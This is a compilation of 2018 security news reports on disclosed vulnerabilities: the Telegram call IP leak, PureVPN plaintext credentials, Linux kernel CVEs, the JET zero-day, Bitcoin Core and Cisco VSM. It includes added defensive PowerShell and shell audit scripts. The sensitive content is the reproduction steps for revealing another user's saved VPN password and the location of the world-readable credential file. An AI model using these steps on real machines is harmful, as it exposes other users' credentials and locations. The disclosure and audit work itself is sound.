1. Open tdesktop,
2. Initiate a call to anyone,
3. You will notice the end user IP address is leaking.
[Screenshot: cve-2018-17780 telegram]

Other scenario:
1. Open tdesktop in Ubuntu and login with user A
2. Open telegram in windows phone login with user B
3. Let user B initiate the call to user A
4. User A’s access log will now contain the public/private IP address of user B.

[Screenshot: cve-2018-17780 telegram 2]

Not only does the MTProto Mobile Protocol fail here to hide the IP address; that information can also be used for OSINT. The issue was fixed in 1.3.17 beta and v1.4.0, which add the option to set P2P to “Nobody” or “My contacts”. CVE-2018-17780 was later assigned to this vulnerability.

[Screenshot: CVE-2018-17780 Telegram]

This bug was awarded €2000 by the Telegram security team. (Sweet.)

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj_)
Original post at https://www.inputzero.io/2018/09/bug-bounty-telegram-cve-2018-17780.html


Vulnerabilities in PureVPN Client Leak User Credentials
29.9.2018 securityweek
Vulnerebility

The PureVPN client for Windows is impacted by two vulnerabilities that result in user credential leak, a Trustwave security researcher has discovered.

The bugs, Trustwave’s Manuel Nader says, may allow a local attacker to retrieve the stored password of the last user who successfully logged in to the PureVPN service. The attack is performed directly through the GUI (Graphical User Interface), without the need of another tool.

For the attack to work, the PureVPN client should have a default installation, the attacker should have access to any local user account, and a user should have successfully logged in to the PureVPN using the client on a Windows machine.

When disclosing another user’s credentials in a multiuser environment, the Windows machine should have more than one user.

The security researcher discovered that, in version 5.18.2.0 of the PureVPN Windows client, the user password is revealed in the application’s configuration window.

To retrieve the password, the attacker simply needs to open the PureVPN client, access the configuration window, open the "User Profile" tab, and click on "Show Password."

The researcher also discovered that the PureVPN client for Windows stores the login credentials (username and password) in plaintext in a login.conf file located at C:\ProgramData\purevpn\config\login.conf. What’s more, all local users have permission to read this file.

The issues were disclosed to the vendor in mid-August 2017. A patch was released in June 2018. PureVPN users on Windows are advised to update to version 6.1.0 or later, as this iteration removes the plaintext password vulnerability.

“The vendor has accepted the risks of the password being revealed in the client's configuration window,” Nader says.


Trustwave expert found 2 credential leak issues in Windows PureVPN Client
29.9.2018 securityaffairs
Vulnerebility

Manuel Nader, an expert from Trustwave, discovered two vulnerabilities in the PureVPN client for Windows that could be exploited by a local attacker to retrieve the stored password of the last user who successfully logged in to the PureVPN service.

The attack works against users using PureVPN client with a default installation, it is launched directly through the Graphical User Interface.

The expert tested for these flaws under the following assumptions and conditions:

The PureVPN client has a default installation.
The attacker has access to any local user account.
Someone has successfully logged in to the PureVPN using the client on a Windows machine at any point in time.
The Windows machine has more than one user in the case of disclosing another users credentials in a multiuser environment.
Nader discovered that the user password is visible in the configuration window of the PureVPN Windows client; the issue affects version 5.18.2.0.

To access the password, the attacker just needs to open the configuration window, open the “User Profile” tab, and click on “Show Password.”

“The PureVPN Windows Client provided by PureVPN may allow a local attacker to retrieve the stored password of the last user who successfully logged in to the PureVPN service. Because of this, a local attacker may obtain another user’s PureVPN credentials when a Windows machine has multiple users if they have successfully logged in.” states the advisory published by Trustwave.

“The attack is done exclusively through the GUI (Graphical User Interface), there’s no need to use an external tool.”

[Image: PureVPN Client]

Nader also discovered that the PureVPN client for Windows stores the login credentials in plain text in a login.conf file at the path C:\ProgramData\purevpn\config\login.conf.

The researcher discovered that any local users have permissions to read this file.

“The PureVPN Windows Client stores the Login Credentials (username and password) in plaintext. The location of such files is: ‘C:\ProgramData\purevpn\config\login.conf'” continues the advisory.

“Additionally, all local users can read this file.”

The expert notified the issues to the vendor in mid-August 2017 and a security patch addressing them was released in June 2018.

PureVPN users are urged to update to version 6.1.0 or later.

“Finally, some recommendations are:

In case you use the PureVPN for Windows, verify you are running the latest version, if not update.
Never reuse password between services.
Whenever possible, enable two-factor authentication.” recommends Trustwave.
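The following PowerShell audit is an added example, not code from Trustwave or PureVPN, and it serves both PureVPN write-ups above: it checks whether the login.conf file at the path Trustwave published is readable by every local account (the second finding) and whether it still appears to hold a plaintext password (the first). The file path is the one in the advisory; the assumption that the file uses key=value lines with a key such as password= is mine, since the advisory does not show the file’s format.

```powershell
# Added example (not PureVPN's or Trustwave's code): audit the PureVPN login.conf
# for the two exposures described in the advisory. Run in a normal (non-elevated)
# user session to reproduce the attacker's view.
function Test-PureVpnCredentialExposure {
    param(
        # Path from the Trustwave advisory
        [string]$Path = 'C:\ProgramData\purevpn\config\login.conf'
    )

    $result = [ordered]@{
        Path               = $Path
        Present            = $false
        ReadableByAnyUser  = $false
        LooksLikePlaintext = $false
        OffendingAces      = @()
    }

    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]$result
    }
    $result.Present = $true

    # Principals that mean "every local account can read this"
    $broadPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
    $readData = [System.Security.AccessControl.FileSystemRights]::ReadData

    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        # Generic rights (GENERIC_READ etc.) show up as raw numbers and are not decoded here
        $grantsRead = ($ace.AccessControlType -eq 'Allow') -and
                      (($ace.FileSystemRights -band $readData) -eq $readData)
        if ($grantsRead -and ($broadPrincipals -contains $ace.IdentityReference.Value)) {
            $result.ReadableByAnyUser = $true
            $result.OffendingAces += "$($ace.IdentityReference) : $($ace.FileSystemRights)"
        }
    }

    # Plaintext heuristic. ASSUMPTION: credentials are stored as key=value lines
    # with a key like "password"; adjust the pattern if the real format differs.
    $content = Get-Content -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($content -match '^\s*(pass(word)?|pwd)\s*=\s*\S+') {
        $result.LooksLikePlaintext = $true
    }

    return [pscustomobject]$result
}

$r = Test-PureVpnCredentialExposure
$r | Format-List

if ($r.Present -and $r.ReadableByAnyUser) {
    Write-Warning "login.conf is readable by every local user; update PureVPN to 6.1.0 or later."
    # Interim hardening if you cannot update yet (run elevated, then confirm the
    # client still connects, since its service may rely on inherited rights):
    #   icacls $r.Path /inheritance:r /grant:r "SYSTEM:(F)" "Administrators:(F)"
}
```

The ACL check is the one that matters for the multi-user scenario in the advisory: a world-readable plaintext file is exposed to any local account regardless of what the GUI shows. Only the ACL tightening is a real mitigation; the GUI “Show Password” behaviour, which the vendor accepted, cannot be fixed from the file system.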


Google Project Zero Discloses New Linux Kernel Flaw
28.9.2018 securityweek
Vulnerebility

Google Project Zero this week disclosed the details and released a proof-of-concept (PoC) exploit for a potentially serious Linux kernel vulnerability.

The flaw, tracked as CVE-2018-17182 and assigned a severity rating of “high,” was discovered by Google Project Zero’s Jann Horn. The security hole is a use-after-free introduced in August 2014 with the release of version 3.16 of the Linux kernel.

Use-after-free vulnerabilities can typically be exploited to corrupt data in memory, cause a process to crash (i.e. DoS attack), and execute arbitrary code or commands.

In the case of CVE-2018-17182, Horn says an attacker could run an arbitrary binary with root privileges. The PoC exploit made available by the researcher can help an attacker gain a root shell, but it takes roughly an hour to execute.

He explained in a blog post that exploitation takes some time because the process triggering the vulnerability needs to run for long enough to overflow a reference counter.

Horn reported his findings to Linux kernel developers on September 12 and a patch was created two days later. “This is exceptionally fast, compared to the fix times of other software vendors,” the expert said.

The issue was disclosed on the oss-security mailing list on September 18, and the patch was rolled out the next day, when it was backported to upstream stable kernel versions 4.18.9, 4.14.71, 4.9.128 and 4.4.157.

The researcher noted that once the patch lands in the upstream kernel, which in this case was September 14, the bug becomes public knowledge – the security impact is obfuscated, but it’s not difficult for experts to figure out. At this point, malicious actors can already create an exploit for it, but Linux distributions need to backport the fix before it can be provided to users.

Horn pointed out, however, that the developers of Linux distributions don’t publish kernel updates very often, leaving users exposed to potential attacks.

“For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly,” Horn explained.

The researcher singled out Debian and Ubuntu developers for not making a patch available to users more than a week after public disclosure of the vulnerability.

“The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime,” Horn said.


Researchers: 11-Year-Old Flaw in Vote Scanner Still Unfixed
28.9.2018 securityweek
Vulnerebility

An uncorrected security flaw in a vote-counting machine used in 23 U.S states leaves it vulnerable to hacking 11 years after the manufacturer was alerted to it, security researchers say.

The M650 high-speed ballot scanner is made by Election Systems & Software, the nation's leading elections equipment vendor. The vulnerability was the most serious noted in voting equipment in a report Thursday that summarized the findings of security researchers at the September DefCon hacking convention's "Voting Village" in Las Vegas, which highlighted a number of vulnerabilities in election equipment.

"This counts the ballots for an entire county," said Jake Braun, one of the organizers and a University of Chicago cybersecurity expert said of the M650. If successfully hacked by someone intent on changing vote totals in a swing-state county, "it could flip the Electoral College," he said.

"One infected disk can take over the entire election system," said Harri Hursti, another "Voting Village" organizer and the researcher who initially detected the flaw in a 2007 report done for the Ohio secretary of state .

Braun said it is both surprising and a reflection of the state of the nation's voting equipment industry that ES&S has continued to support and service the M650 — and that many election officials have not retired it.

Cybersecurity experts have long complained that the nation's antiquated elections infrastructure is highly vulnerable to tampering — now a critical concern given documented Russian attempts to influence the 2016 presidential election. Those activities included probes of elections systems in at least 21 states, a hack into the Illinois voter-registration database and attempts to hack a Florida maker of electronic poll books.

A National Academies of Sciences report in September urged essential reforms by 2020 including sustained federal funding, since elections are administered by the states and security is typically shortchanged. Other recommendations included retiring electronic machines that lack a "human-readable" paper trail and making reliable post-election audits mandatory. The GOP leadership in Congress has recently stymied efforts to pass election-reform legislation.

The M650 scans paper ballots — it can process more than 300 per minute. ES&S said in a statement Thursday that it discontinued manufacture of the machines in 2008 but that 270 are in active use today. It said the machine has "a solid, proven track record when used in a real election environment with proper physical controls," although it has been replaced by more secure models.

"We believe that the security protections on the M650 are strong enough to make it extraordinarily difficult to hack in a real-world environment and, therefore, safe and secure to use in an election," the company said.

Proper physical controls would prevent access to the machines by unauthorized outsiders who might introduce a vote count-altering virus. Hursti, however, said he's spoken to elections officials who program the M650 program with removable Zip drive disks that could transmit malware. It's also possible to infect the machine via a built-in network port.

ES&S did not respond when asked by the Associated Press why it had not corrected the Zip drive vulnerability despite knowing about it for more than a decade. It also did not say whether it continues to sell the M650, which was listed on its website product offerings as recently as last month.

The DefCon village, now in its second year, was attended by more than 100 elections officials from across the nation. Senior officials from the National Security Agency and the Department of Homeland Security endorsed its organizers' assertion that the best way to secure elections equipment is to let friendly hackers attack it.

ES&S disagreed. It complained in an Aug. 24 letter to a group of U.S. senators that "exposing technology in these kinds of environments makes hacking elections easier, not harder, and we suspect that our adversaries are paying very close attention."

Organizers of the Voting Village obtained more than 30 pieces of voting equipment and other machines for security testing, but were significantly limited in what they could test, mostly because vendors refused to make proprietary equipment available. Researchers did not test any election management or voter registration systems.


CVE-2018-17182 – Google Project Zero reports a new Linux Kernel flaw
28.9.2018 securityaffairs
Vulnerebility

Google Project Zero disclosed details of a high-severity Linux kernel use-after-free vulnerability tracked as CVE-2018-17182. It was discovered by Google Project Zero’s Jann Horn and was introduced in August 2014 with the release of version 3.16 of the Linux kernel.

The issue could be exploited by an attacker to trigger a DoS condition or to execute arbitrary code with root privileges on the vulnerable system.

The expert reported the flaw to the Linux kernel development team on September 12 and they fixed it just two days later.

Horn also published the PoC exploit for the vulnerability, the researcher explained that exploitation of the issue is time-consuming because the process triggering the vulnerability needs to run for long enough to cause the overflow for a reference counter.

“This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that exists since kernel version 3.16.” reads the security advisory published by Project Zero.

“Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.”

The researcher warns that threat actors may already be able to develop an exploit for the vulnerability. A further concern is that Linux distributions don’t publish kernel updates very frequently, which leaves users exposed to attacks in the meantime.

“However, Linux distributions often don’t publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27.” Horn explained.

“Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users – especially if the security impact is not announced publicly.”

The exploit also demonstrates the importance of a hardened kernel configuration: Horn notes that settings such as the kernel.dmesg_restrict sysctl provide “a reasonable tradeoff when enabled”.
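Horn’s point in both CVE-2018-17182 write-ups above is the gap between an upstream stable release carrying the fix and a distribution kernel actually shipping it. The shell script below is an added example (not Project Zero’s code) that classifies a kernel release string against the five fixed stable releases listed in the Project Zero post (3.16.58, 4.4.157, 4.9.128, 4.14.71, 4.18.9). It assumes GNU `sort -V` is available. Because distributions backport fixes without bumping the upstream version, a result of “vulnerable” means “upstream version predates the fix, check the vendor changelog”, not “confirmed exploitable”; that caveat is exactly the exposure window the articles describe.

```sh
#!/bin/sh
# Added example, not Project Zero's code: classify a kernel release string
# against the upstream stable releases that carry the CVE-2018-17182 fix.
# Requires GNU "sort -V" (coreutils or a recent busybox).
#
# Caveat: distribution kernels (Debian, Ubuntu, RHEL, Android) backport fixes
# without changing the upstream version string, so "vulnerable" here means
# "check your vendor's changelog", not "confirmed exploitable".

FIXED_RELEASES="3.16.58 4.4.157 4.9.128 4.14.71 4.18.9"

# "4.9.110-3+deb9u4" -> "4.9.110", "4.15.0-34-generic" -> "4.15.0"
base_version() {
    printf '%s\n' "$1" | sed -E 's/^([0-9]+\.[0-9]+(\.[0-9]+)?).*/\1/'
}

# "4.9.110" -> "4.9"
series_of() {
    printf '%s\n' "$1" | cut -d. -f1,2
}

# True if $1 >= $2 in version order
version_ge() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | tail -n 1)" = "$1" ]
}

# Prints one of: predates-bug, fixed, vulnerable, fixed-mainline, unknown-series
cve_2018_17182_status() {
    v=$(base_version "$1")
    s=$(series_of "$v")

    # The bug was introduced in 3.16 (August 2014), so older series are not affected
    if ! version_ge "$s" 3.16; then
        echo predates-bug
        return 0
    fi

    # Series with an upstream stable fix: compare against that release
    for f in $FIXED_RELEASES; do
        if [ "$(series_of "$f")" = "$s" ]; then
            if version_ge "$v" "$f"; then echo fixed; else echo vulnerable; fi
            return 0
        fi
    done

    # No stable branch for this series at the time: 4.19 and later contain the
    # mainline fix (landed 2018-09-14); anything else (e.g. Ubuntu's 4.15) is
    # vendor-maintained and must be checked against the vendor's changelog.
    if version_ge "$s" 4.19; then echo fixed-mainline; else echo unknown-series; fi
}

# Report on the running kernel, or on a release string passed as $1
rel="${1:-$(uname -r)}"
printf '%s: %s\n' "$rel" "$(cve_2018_17182_status "$rel")"
```

Feed it `uname -r` on each host, or the kernel version column from your inventory, and treat “vulnerable” and “unknown-series” as the set of machines whose vendor changelog needs a manual look for the CVE-2018-17182 backport.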


Linux Kernel Vulnerability Affects Red Hat, CentOS, Debian
27.9.2018 securityweek
Vulnerebility

Qualys has disclosed the details of an integer overflow vulnerability in the Linux kernel that can be exploited by a local attacker for privilege escalation. The flaw, dubbed “Mutagen Astronomy,” affects certain versions of the Red Hat, CentOS and Debian distributions.

Tracked as CVE-2018-14634, the flaw exists in the kernel’s create_elf_tables() function. The security hole can be exploited using a SUID binary to escalate privileges to root, but it only works on 64-bit systems.

The vulnerability affects versions of the kernel released between July 19, 2007, and July 7, 2017. While many Linux distributions have backported the commit that addresses the bug, the fix hasn’t been implemented in Red Hat Enterprise Linux, CentOS (which is based on Red Hat), and Debian 8 Jessie.

According to an advisory published by Qualys on Tuesday, the vulnerability was reported to Red Hat on August 31 and to Linux kernel developers on September 18. The cloud-based security and compliance solutions provider has made available both technical details and proof-of-concept (PoC) exploits.

Red Hat, which assigned the flaw an impact rating of “important” and a CVSS score of 7.8 (high severity), has started releasing updates that should address the issue.

“This issue does not affect 32-bit systems as they do not have a large enough address space to exploit this flaw,” Red Hat explained. “Systems with less than 32GB of memory are unlikely to be affected by this issue due to memory demands during exploitation.”

“This issue affects the version of the kernel packages as shipped with Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2. Future kernel updates for Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2 will address this issue,” Red Hat said.

Both CentOS and Red Hat developers have provided mitigations for the vulnerability.


Mutagen Astronomy Linux Kernel vulnerability affects Red Hat, CentOS, and Debian distros
27.9.2018 securityaffairs
Vulnerebility

A new integer overflow vulnerability has been found in the Linux kernel. Dubbed Mutagen Astronomy, it affects Red Hat, CentOS, and Debian distributions.
Security researchers have discovered a new integer overflow vulnerability in Linux Kernel, dubbed Mutagen Astronomy, that affects Red Hat, CentOS, and Debian Distributions.

The vulnerability could be exploited by an unprivileged user to gain superuser access to the targeted system.

The flaw was discovered by researchers at security firm Qualys, who shared technical details of the Mutagen Astronomy vulnerability, including proof-of-concept (PoC) exploits (Exploit 1, Exploit 2).

The flaw, tracked as CVE-2018-14634, affects kernel versions released between July 2007 and July 2017; Linux kernel versions 2.6.x, 3.10.x and 4.14.x are vulnerable to the Mutagen Astronomy flaw.

The versions of Linux kernel as shipped with Red Hat Enterprise Linux 5 are not affected by the issue.

The Mutagen Astronomy vulnerability exists in the create_elf_tables() function in the Linux kernel that is used to manage memory tables.

“We discovered an integer overflow in the Linux kernel’s create_elf_tables() function: on a 64-bit system, a local attacker can exploit this vulnerability via a SUID-root binary and obtain full root privileges.” reads the security advisory published by Qualys.

“Only kernels with commit b6a2fea39318 (“mm: variable length argument support”, from July 19, 2007) but without commit da029c11e6b1 (“exec: Limit arg stack to at most 75% of _STK_LIM”, from July 7, 2017) are exploitable. Most Linux distributions backported commit da029c11e6b1 to their long-term-supported kernels, but Red Hat Enterprise Linux and CentOS (and Debian 8, the current “oldstable” version) have not, and are therefore vulnerable and exploitable.”

Like other local privilege escalation issues, exploiting this flaw requires access to the targeted system and the execution of exploit code that triggers a buffer overflow.

Once the attacker has triggered the buffer overflow, they can execute arbitrary code on the affected machine and take it over.

“An integer overflow flaw was found in the Linux kernel’s create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system.” reads the security advisory published by Red Hat.

“This issue does not affect 32-bit systems as they do not have a large enough address space to exploit this flaw. Systems with less than 32GB of memory are very unlikely to be affected by this issue due to memory demands during exploitation.

This issue does not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 5. This issue affects the version of the kernel packages as shipped with Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2. Future kernel updates for Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2 will address this issue.”


At the time of writing, Red Hat Enterprise Linux, CentOS, and Debian 8 Jessie have not yet addressed the flaw.

Below is the timeline for the flaw:

2018-08-31: Contacted secalert@redhat.com.
2018-09-18: Contacted linux-distros@vs.openwall.org and security@kernel.org.
2018-09-25: Coordinated Release Date (Time: 5:00 PM UTC).


Third-Party Patch Available for Microsoft JET Database Zero-Day
26.9.2018 securityweek
Vulnerebility

An unofficial patch is already available for the unpatched Microsoft JET Database Engine vulnerability that Trend Micro's Zero Day Initiative (ZDI) made public last week.

The security flaw, an out-of-bounds (OOB) write in the JET Database Engine that could be exploited for remote code execution, was reported to the vendor in early May. ZDI disclosed the issue publicly because 120 days had passed since it notified the vendor, even though a patch hadn’t been released.

The bug resides in the manner in which indexes are managed in JET. Crafted data in a database file can trigger a write past the end of an allocated buffer and an attacker could exploit this to execute code under the context of the current process. Exploitation, however, requires user interaction.

Despite not being considered critical, attackers could use social engineering to trick users into opening malicious files capable of triggering the exploit.

Now, 0patch, a community project focused on resolving software vulnerabilities by delivering tiny fixes to users worldwide, says they were able to devise a patch for the bug less than a day after ZDI went public with their findings.

In a blog post detailing the fix, ACROS Security CEO Mitja Kolsek explains that, with JET only working on 32-bit systems, the proof-of-concept (PoC) code provided by ZDI would cause an error message on 64-bit systems, unless launched with wscript.exe.

Because it attempts to write past the allocated memory block, the PoC causes a crash in wscript.exe, and this is where the security researchers started from when building their patch.

Kolsek notes that a micro-patch was ready for Windows 7 only 7 hours after ZDI had published their PoC and that the fix would work on all platform iterations sharing the exact same version of msrd3x40.dll as Windows 7.

Windows 10, however, has a slightly different msrd3x40.dll, and the security researchers had to make a small tweak to the initial micro-patch to address the issue in this platform iteration as well. According to Kolsek, they used the exact same source code, just a different file hash.

“These two micropatches for a published 0day were then issued less than 24 hours after the 0day was dropped, and distributed to our users' computers within 60 minutes, where they were automatically applied to any running process with vulnerable msrd3x40.dll loaded. Which nicely demonstrates the speed, simplicity and user-friendliness of micropatching when it comes to fixing vulnerabilities,” Kolsek notes.

The patches are free for everyone. Users interested in getting them only need to install and register the 0patch Agent. Even with these micro-patches, however, users are still advised to install Microsoft’s official fixes once they arrive.


0patch community released micro patches for Microsoft JET Database Zero-Day
26.9.2018 securityaffairs
Vulnerebility

0patch community released an unofficial patch for the Microsoft JET Database Engine zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative
Experts from 0patch, a community of experts that aims at addressing software flaws, released an unofficial patch for the Microsoft JET Database Engine zero-day vulnerability that Trend Micro’s Zero Day Initiative (ZDI) disclosed last week.

The Microsoft JET Database Engine flaw is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited by a remote attacker to execute arbitrary code on the vulnerable systems.

The zero-day vulnerability has received a CVSS score of 6.8 and resides in the management of indexes in JET. An attacker can use specially crafted data in a database file to trigger a write past the end of an allocated buffer.

According to the ZDI’s disclosure policy, details on the vulnerability could be released 120 days after the vendor was notified on the issue, even if the flaw was still unpatched.

ZDI also published the proof-of-concept (PoC) exploit code for the vulnerability.

The 0patch community is known for developing tiny patches, usually less than 30 bytes in size; it released a fix within 24 hours of the public disclosure of the issue.

0patch experts were able to devise a security patch for the zero-day in less than 24 hours.

0patch
@0patch
· Sep 20, 2018
7 hours after @thezdi has published details on this unpatched remotely exploitable vulnerability in Jet Database Engine, we have a micropatch candidate on Windows 7. More on this vulnerability and our micropatch soon. https://twitter.com/thezdi/status/1042797177590964225 …

0patch
@0patch
We're happy to announce general availability of two free micropatches for the Jet Engine Out-Of-Bounds Write vulnerability disclosed yesterday by @thezdi. These micropatches apply to fully updated 32bit and 64bit:

- Windows 10
- Windows 8.1
- Windows 7
- Windows Server 2008-2016 pic.twitter.com/Du1cTFafiM

3:50 PM - Sep 21, 2018
Experts from 0patch highlighted that the PoC code published by ZDI only works on 32-bit systems; on 64-bit systems it would instead produce an error message, unless launched with wscript.exe.

The experts’ analysis started from the closest observable point of failure, the conditions that trigger the crash.

“As usually, we started our analysis from the closest observable point of failure and worked backward to the vulnerable code. Ideally, the “closest observable point of failure” is a process crash, and in this case, ZDI’s PoC indeed causes a crash in wscript.exe due to an attempt to write past the allocated memory block. So their PoC was perfect for us.” reads the analysis of the 0patch experts.

“(Not surprisingly, it’s easier for us to work with a crash case than a full blown calc-popping exploit.) Here’s how the crash looks like in WinDbg, with Page Heap enabled and invalid memory access in function TblPage::CreateIndexes:”

0patch released the micro-patch for Windows 7 just 7 hours after ZDI shared the PoC for the Windows Microsoft JET Database Engine zero-day.

When the experts then attempted to port the patch to other supported Windows versions, they noticed that almost all of them ship the exact same version of msrd3x40.dll, which suggested that the same micropatch would apply to all of these systems.

The experts pointed out that only one Windows version, Windows 10, ships a different msrd3x40.dll.

“The only Windows version with a different msrd3x40.dll was Windows 10: peculiarly, both DLLs had the same version and exactly the same size, but plenty of small differences between the two (including the link timestamp). The code was exactly the same and in the same place though (probably just a re-build), so we could actually use the exact same source code for the micropatch, just a different file hash.” continues the analysis.

The two micro patches for the Windows 0day were issued in less than 24 hours after the public disclosure of the technical details of the flaw.

“These two micropatches for a published 0day were then issued less than 24 hours after the 0day was dropped, and distributed to our users’ computers within 60 minutes, where they were automatically applied to any running process with vulnerable msrd3x40.dll loaded. Which nicely demonstrates the speed, simplicity and user-friendliness of micropatching when it comes to fixing vulnerabilities.” continues the analysis.

Users who want the micropatches just need to install and register the 0patch Agent; it is nonetheless strongly recommended to install Microsoft’s official updates once Microsoft issues them.


Bitcoin Core Team fixes a critical DDoS flaw in wallet software
25.9.2018 securityaffairs
Vulnerebility

The Bitcoin Core team fixed a critical DDoS vulnerability in the Bitcoin Core wallet software, tracked as CVE-2018-17144.
The Bitcoin Core team urges miners to update client software with the latest Bitcoin Core 0.16.3 version as soon as possible.

“A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up to 0.16.2. It is recommended to upgrade any of the vulnerable versions to 0.16.3 as soon as possible,” states the security advisory.

The flaw affected the Bitcoin Core wallet software and could have been exploited by attackers to crash Bitcoin Core nodes running software versions 0.14.0 to 0.16.2.

The CVE-2018-17144 vulnerability is critical because, by coordinating an attack through Bitcoin miners, it was possible to bring down the entire blockchain: either by flooding a block with duplicate transactions, which blocks the confirmation of other people’s transactions, or by flooding the nodes of the Bitcoin P2P network and saturating their bandwidth.

The bug seems to have been introduced in March 2017, but no one apparently has exploited the flaw in live attacks.

The flaw potentially affects all recent versions of the BTC system, but experts pointed out that a coordinated Distributed Denial of Service (DDoS) attack against the Bitcoin blockchain would be very expensive.

It has been estimated that a successful DDoS attack on the BTC network would cost miners 12.5 bitcoins ($80,000).

According to the change log of the latest version, the Bitcoin Core team also patched minor issues related to RPC and other APIs, invalid error flags, consensus, and documentation.

“If you are running an older version, shut it down. Wait until it has completely shut down (which might take a few minutes for older versions), then run the installer (on Windows) or just copy over `/Applications/Bitcoin-Qt` (on Mac) or `bitcoind`/`bitcoin-qt` (on Linux).” continues the note.

“The first time you run version 0.15.0 or newer, your chainstate database will be converted to a new format, which will take anywhere from a few minutes to half an hour, depending on the speed of your machine.”


Cisco Removes Default Password From Video Surveillance Manager
24.9.2018 securityweek
Vulnerebility

A critical vulnerability recently patched in the Cisco Video Surveillance Manager (VSM) could allow an unauthenticated attacker to log in as root.

The security flaw, Cisco revealed on Friday, impacts only the VSM software running on certain Connected Safety and Security Unified Computing System (UCS) platforms. The issue, the company says, resides in the presence of default, static credentials for the root account.

The credentials for the account are undocumented and only impact certain systems, the company underlines. An attacker exploiting the vulnerability could log in to the affected systems and execute arbitrary commands as the root user.

The bug, Cisco reveals, impacts VSM Software releases 7.10, 7.11, and 7.11.1. The issue, however, only manifests if the software was preinstalled by Cisco and only impacts the CPS-UCSM4-1RU-K9, CPS-UCSM4-2RU-K9, KIN-UCSM5-1RU-K9, and KIN-UCSM5-2RU-K9 Connected Safety and Security UCS platforms.

“This vulnerability exists because the root account of the affected software was not disabled before Cisco installed the software on the vulnerable platforms, and default, static user credentials exist for the account. The user credentials are not documented publicly,” Cisco notes in an advisory.

VSM Software Releases 7.9 and earlier are not impacted by the bug. VSM releases 7.10, 7.11, and 7.11.1 running on CPS-UCSM4-1RU-K9 and CPS-UCSM4-2RU-K9 platforms aren’t impacted either if they were installed as upgrades to a pre-installed release 7.9. VSM on the VMware ESXi platform isn’t impacted either.

There are no workarounds for this vulnerability and affected users are advised to upgrade to VSM Release 7.12 to patch it. Those who do not want to upgrade should contact the Cisco TAC for further assistance.

“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability,” Cisco also notes.


Critical flaw affects Cisco Video Surveillance Manager
September 24, 2018 By Pierluigi Paganini
Vulnerebility

Cisco has patched a critical vulnerability in the Cisco Video Surveillance Manager (VSM) that could be exploited by an unauthenticated remote attacker to gain root access.
Cisco has fixed a critical vulnerability in the Cisco Video Surveillance Manager software running on some Connected Safety and Security Unified Computing System (UCS) platforms.

The flaw could give an unauthenticated, remote attacker the ability to execute arbitrary commands as root on targeted systems.

The software running on certain systems includes default, static credentials for the root account that could allow attackers to gain root access.

The credentials for the account are undocumented.

“The vulnerability is due to the presence of undocumented, default, static user credentials for the root account of the affected software on certain systems,” reads the advisory published by Cisco.

“An attacker could exploit this vulnerability by using the account to log in to an affected system.”

The vulnerability impacts Cisco Video Surveillance Manager (VSM) Software releases 7.10, 7.11, and 7.11.1. The flaw only affects systems where the software was preinstalled by Cisco and only impacts the CPS-UCSM4-1RU-K9, CPS-UCSM4-2RU-K9, KIN-UCSM5-1RU-K9, and KIN-UCSM5-2RU-K9 Connected Safety and Security UCS platforms.


“This vulnerability exists because the root account of the affected software was not disabled before Cisco installed the software on the vulnerable platforms, and default, static user credentials exist for the account. The user credentials are not documented publicly,” continues the Cisco advisory.

At this time there are no workarounds for this vulnerability; users are urged to upgrade to VSM Release 7.12 to address the flaw.

Cisco confirmed that it is not aware of any attack leveraging the issue.

“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability,” Cisco concludes.

Recently Cisco issued another warning for a critical static credential flaw in its IOS XE software.


ZDI Shares Details of Microsoft JET Database Zero-Day
24.9.2018 securityweek
Vulnerebility

Trend Micro's Zero Day Initiative (ZDI) on Thursday made public details on a vulnerability impacting the Microsoft JET Database Engine, although a patch isn’t yet available for it.

The zero-day vulnerability was reported to Microsoft in early May 2018 and a fix was expected to be included in the company’s September set of security updates, but it did not make the cut.

As per the ZDI’s disclosure policy, information on the bug was released publicly 120 days after the vendor was notified of its existence, despite the lack of a patch.

The issue, ZDI explains, is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited for remote code execution.

Discovered by Lucas Leong of Trend Micro Security Research, the flaw resides in the management of indexes in JET and crafted data in a database file can trigger a write past the end of an allocated buffer.

Although an attacker could leverage the vulnerability to execute code under the context of the current process, exploitation requires user interaction, ZDI’s Simon Zuckerbraun explains in a blog post. Specifically, it requires for the victim to open a malicious file that would trigger the bug.

“Microsoft patched two other issues in JET in the September Patch Tuesday updates. While the patched bugs are listed as buffer overflows, this additional bug is actually an out-of-bounds write, which can be triggered by opening a Jet data source via OLEDB,” Zuckerbraun notes.
